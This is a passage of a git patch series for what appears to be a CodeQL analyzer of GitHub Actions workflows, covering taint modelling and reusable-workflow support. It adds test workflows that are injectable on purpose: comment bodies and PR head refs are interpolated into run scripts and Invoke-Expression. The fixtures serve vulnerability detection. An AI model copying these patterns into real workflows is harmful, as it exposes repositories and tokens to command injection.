StandardPreOrderTree instanceof RunExpr { + override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } +} + +private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } + diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5ce82a134ce..b2ab51e28fa 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,18 +19,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and - uses.getVersion() = ["v1", "v20", "v30", "v40"] and - uses = this.asExpr() - ) - } - - override string getSourceType() { result = "User-controlled list of changed files" } -} - bindingset[context] private predicate isExternalUserControlledIssue(string context) { context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or @@ -135,3 +123,15 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v10", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 8b57ea2436e..9f028623848 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -97,8 +97,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof StepStmt - then result = this.(StepStmt).getName() - else result = this.(JobStmt).getName() + then result = this.(StepStmt).getId() + else result = this.(JobStmt).getId() } } @@ -295,4 +295,3 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } - From da2ac2af03bb73814a7727796312464cbf35f4d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:52:14 +0100 Subject: [PATCH 0009/1267] Process only .github/workflows yaml files --- ql/lib/codeql/actions/ast/internal/Actions.qll | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index e3be61fd3b9..a11759b0c93 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -19,9 +19,7 @@ module Actions { f = this.getLocation().getFile() and ( f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] or - // ALVARO: Add any yaml files temporary for development - f.getExtension() = ["yml", "yaml"] + f.getBaseName() = ["action.yml", "action.yaml"] ) ) } From 1708e0f19d76f2feebc7cab3ecd81a0bc2b65878 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:55:21 +0100 Subject: [PATCH 0010/1267] Move tests files to .github/workflows --- ql/lib/test/{ => .github/workflows}/test.yml | 0 .../{ => .github/workflows}/changed-files.yml | 0 ql/src/test/.github/workflows/ci-cleanup.yml | 47 ++++++++++++++ .../workflows/image_link_generator.yml | 55 +++++++++++++++++ .../workflows/image_link_generator_2.yml | 61 +++++++++++++++++++ .../workflows/image_link_generator_3.yml | 27 ++++++++ .../test/{ => .github/workflows}/inter1.yml | 0 .../test/{ => .github/workflows}/no-flow1.yml | 0 .../test/{ => .github/workflows}/no-flow2.yml | 0 .../test/{ => .github/workflows}/simple1.yml | 0 .../test/{ => .github/workflows}/simple2.yml | 0 ql/src/test/{ => .github/workflows}/test.yml | 0 12 files changed, 190 insertions(+) rename ql/lib/test/{ => .github/workflows}/test.yml (100%) rename ql/src/test/{ => .github/workflows}/changed-files.yml (100%) create mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/{ => .github/workflows}/inter1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow2.yml (100%) rename ql/src/test/{ => .github/workflows}/simple1.yml (100%) rename ql/src/test/{ => .github/workflows}/simple2.yml (100%) rename ql/src/test/{ => .github/workflows}/test.yml (100%) diff --git a/ql/lib/test/test.yml b/ql/lib/test/.github/workflows/test.yml similarity index 100% rename from ql/lib/test/test.yml rename to ql/lib/test/.github/workflows/test.yml diff --git a/ql/src/test/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml similarity index 100% rename from ql/src/test/changed-files.yml rename to ql/src/test/.github/workflows/changed-files.yml diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml new file mode 100644 index 00000000000..11a101cef49 --- /dev/null +++ b/ql/src/test/.github/workflows/ci-cleanup.yml @@ -0,0 +1,47 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - "images/**" + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml new file mode 100644 index 00000000000..6239f0490d1 --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -0,0 +1,55 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + run: | + INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + run: | + TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + run: | + COMMENT_URL="${{ github.event.comment.url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml new file mode 100644 index 00000000000..01d33249251 --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_2.yml @@ -0,0 +1,61 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} + run: | + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} + run: | + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml new file mode 100644 index 00000000000..70aece4f7cf --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_3.yml @@ -0,0 +1,27 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: source + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: sink + run: | + echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/inter1.yml b/ql/src/test/.github/workflows/inter1.yml similarity index 100% rename from ql/src/test/inter1.yml rename to ql/src/test/.github/workflows/inter1.yml diff --git a/ql/src/test/no-flow1.yml b/ql/src/test/.github/workflows/no-flow1.yml similarity index 100% rename from ql/src/test/no-flow1.yml rename to ql/src/test/.github/workflows/no-flow1.yml diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/.github/workflows/no-flow2.yml similarity index 100% rename from ql/src/test/no-flow2.yml rename to ql/src/test/.github/workflows/no-flow2.yml diff --git a/ql/src/test/simple1.yml b/ql/src/test/.github/workflows/simple1.yml similarity index 100% rename from ql/src/test/simple1.yml rename to ql/src/test/.github/workflows/simple1.yml diff --git a/ql/src/test/simple2.yml b/ql/src/test/.github/workflows/simple2.yml similarity index 100% rename from ql/src/test/simple2.yml rename to ql/src/test/.github/workflows/simple2.yml diff --git a/ql/src/test/test.yml b/ql/src/test/.github/workflows/test.yml similarity index 100% rename from ql/src/test/test.yml rename to ql/src/test/.github/workflows/test.yml From 83ca36bc76ff38f99be4c14a2f07a69b0ab021b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:56:22 +0100 Subject: [PATCH 0011/1267] Support RunExpr's env vars --- ql/lib/codeql/actions/Ast.qll | 8 +++++ .../actions/controlflow/internal/Cfg.qll | 14 ++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 +++++++++++++++++++ .../dataflow/internal/DataFlowPrivate.qll | 15 +++++++-- 4 files changed, 65 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d2c7fdd4501..d9306b53815 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -169,6 +169,13 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } + string getScript() { result = scriptExpr.getValue() } } @@ -183,6 +190,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJob() { result.getAChildNode*() = this } + //override string toString() { result = expr } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index c549eb40198..a2ebb10219e 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -171,8 +171,18 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } private class RunTree extends StandardPreOrderTree instanceof RunExpr { - override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } - diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 528f9e54832..223ff305ba4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -20,6 +20,9 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if actions-find-and-replace-string step is used. + */ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | @@ -29,3 +32,32 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { ) } } + +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + * echo "Cleaned Initial URL: $INITIAL_URL" + * echo "::set-output name=initial_url::$INITIAL_URL" + */ +private class RunEnvToScriptStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } +} + +predicate test(DataFlow::Node pred, DataFlow::Node succ) { + exists(RunExpr r, string varName | + r.getEnvExpr(varName) = pred.asExpr() and + exists(string script, string line | + script = r.getScript() and + line = script.splitAt("\n") and + line.regexpMatch(".*::set-output\\s+name.*") and + script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) and + succ.asExpr() = r + ) +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 9f028623848..534eb4fe657 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -197,7 +197,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } -predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output exists(UsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and @@ -207,6 +207,16 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(RunExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -223,7 +233,8 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepOutputDefToUse(nodeFrom, nodeTo) or + usesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } From 5006ffe20338f5355fdb578527b06acfa04f3285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 12:01:41 +0100 Subject: [PATCH 0012/1267] Use the LibYaml default AST hierarchy --- ql/lib/codeql/actions/Ast.qll | 37 +---------------------------------- 1 file changed, 1 insertion(+), 36 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d9306b53815..96a8a2a7f14 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,48 +2,13 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. - * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: - * eg: top: - * key: value - * According to the Yaml library, both `key` and `value` are direct children of `top` - * This Tree implementation makes `key` child od `top` and `value` child of `key` + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } - // AstNode getParentNode() { - // if exists(YamlMapping m | m.maps(_, this)) - // then exists(YamlMapping m | m.maps(result, this)) - // else result = super.getParentNode() - // } AstNode getAChildNode() { result = super.getAChildNode() } - // AstNode getAChildNode() { - // if this instanceof YamlMapping - // then this.(YamlMapping).maps(result, _) - // else - // if this instanceof YamlCollection - // then result = super.getChildNode(_) - // else - // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - // then exists(YamlMapping m | m.maps(this, result)) - // else none() - // } - // /** - // * This should be getAChildNode(int i) - // */ - // AstNode getChildNodeByOrder(int i) { - // result = - // rank[i](Expression child, Location l | - // child = this.getAChildNode() and - // child.getLocation() = l - // | - // child - // order by - // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - // ) - // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } From db413361f78c836c190b112dafbbc1a1991dff52 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:11:39 +0100 Subject: [PATCH 0013/1267] Add Reusable Workflow test --- .../.github/workflows/calling_workflow.yml | 18 ++++++++++++++++++ .../.github/workflows/reusable_workflow.yml | 18 ++++++++++++++++++ 2 files changed, 36 insertions(+) create mode 100644 ql/lib/test/.github/workflows/calling_workflow.yml create mode 100644 ql/lib/test/.github/workflows/reusable_workflow.yml diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml new file mode 100644 index 00000000000..3b0ab8f18d3 --- /dev/null +++ b/ql/lib/test/.github/workflows/calling_workflow.yml @@ -0,0 +1,18 @@ +on: push + +jobs: + call-workflow-1-in-local-repo: + uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-2-in-local-repo: + uses: ./.github/workflows/reusable_workflow.yml + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-in-another-repo: + uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml new file mode 100644 index 00000000000..f31c8a63d74 --- /dev/null +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml @@ -0,0 +1,18 @@ +name: Reusable workflow example + +on: + workflow_call: + inputs: + config-path: + required: true + type: string + secrets: + token: + required: true + +jobs: + triage: + runs-on: ubuntu-latest + steps: + - id: sink + run: echo ${{ inputs.config-path }} From 9659098ab6745ff95c14ae0683423b1c18971408 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:40:06 +0100 Subject: [PATCH 0014/1267] Support for Reusable workflows --- ql/lib/codeql/actions/Ast.qll | 114 +++++++++++++++++- .../actions/controlflow/internal/Cfg.qll | 48 +++++++- .../dataflow/internal/DataFlowPrivate.qll | 76 +++++++----- ql/lib/test/.github/workflows/test.yml | 10 +- ql/lib/test/test.ql | 19 ++- 5 files changed, 217 insertions(+), 50 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 96a8a2a7f14..8f8347e766f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,8 +34,51 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJob() { result = super.getJob(_) } JobStmt getJob(string id) { result = super.getJob(id) } + + predicate isReusable() { this instanceof ReusableWorkflowStmt } } +class ReusableWorkflowStmt extends WorkflowStmt { + YamlMapping parameters; + + ReusableWorkflowStmt() { + exists(Actions::On on | + on.getWorkflow() = this and + on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters + ) + } + + ParamsStmt getParams() { result = parameters } + + // TODO: implemnt callable name + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class ParamsStmt extends Statement instanceof YamlMapping { + ParamsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * inputs: + * config-path: + * required: true + * type: string + * secrets: + * token: + * required: true + */ + ParamExpr getParamExpr(string name) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + } +} + +class ParamExpr extends Expression instanceof YamlValue { } + /** * A Job is a collection of steps that run in an execution environment. */ @@ -71,6 +114,11 @@ class JobStmt extends Statement instanceof Actions::Job { * out2: ${steps.foo.baz} */ JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + /** + * Reusable workflow jobs may have Uses children + */ + JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } } /** @@ -104,19 +152,27 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +abstract class UsesExpr extends Expression { + abstract string getTarget(); + + abstract string getVersion(); + + abstract Expression getArgument(string key); +} + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesExpr extends StepStmt, Expression { +class StepUsesExpr extends StepStmt, UsesExpr { Actions::Uses uses; - UsesExpr() { uses.getStep() = this } + StepUsesExpr() { uses.getStep() = this } - string getTarget() { result = uses.getGitHubRepository() } + override string getTarget() { result = uses.getGitHubRepository() } - string getVersion() { result = uses.getVersion() } + override string getVersion() { result = uses.getVersion() } - Expression getArgument(string key) { + override Expression getArgument(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) @@ -124,6 +180,54 @@ class UsesExpr extends StepStmt, Expression { } } +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. + */ +class JobUsesExpr extends UsesExpr instanceof YamlScalar { + JobStmt job; + + JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } + + JobStmt getJob() { result = job } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ + private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + + private string pathUsesParser() { result = "\\./(.+)" } + + override string getTarget() { + exists(string name | + this.(YamlScalar).getValue() = name and + if name.matches("./%") + then result = name.regexpCapture(this.pathUsesParser(), 1) + else + result = + name.regexpCapture(this.repoUsesParser(), 1) + "/" + + name.regexpCapture(this.repoUsesParser(), 2) + "/" + + name.regexpCapture(this.repoUsesParser(), 3) + ) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(string name | + this.(YamlScalar).getValue() = name and + if not name.matches("\\.%") + then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + else none() + ) + } + + override Expression getArgument(string key) { + job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + } +} + /** * A Run step represents the evaluation of a provided script */ diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index a2ebb10219e..ac8ab616e3e 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,6 +87,8 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } + private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + private class JobScope extends CfgScope instanceof JobStmt { } } @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(JobStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(ReusableWorkflowStmt), e, c) or + last(scope.(JobStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -139,11 +147,30 @@ private import CfgImpl private import Completion private import CfgScope +private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { + override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } +} + +private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getParamExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ParamExprTree extends LeafTree instanceof ParamExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt()) and + (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and l = child.getLocation() | child @@ -157,7 +184,20 @@ private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStm override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } } -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = 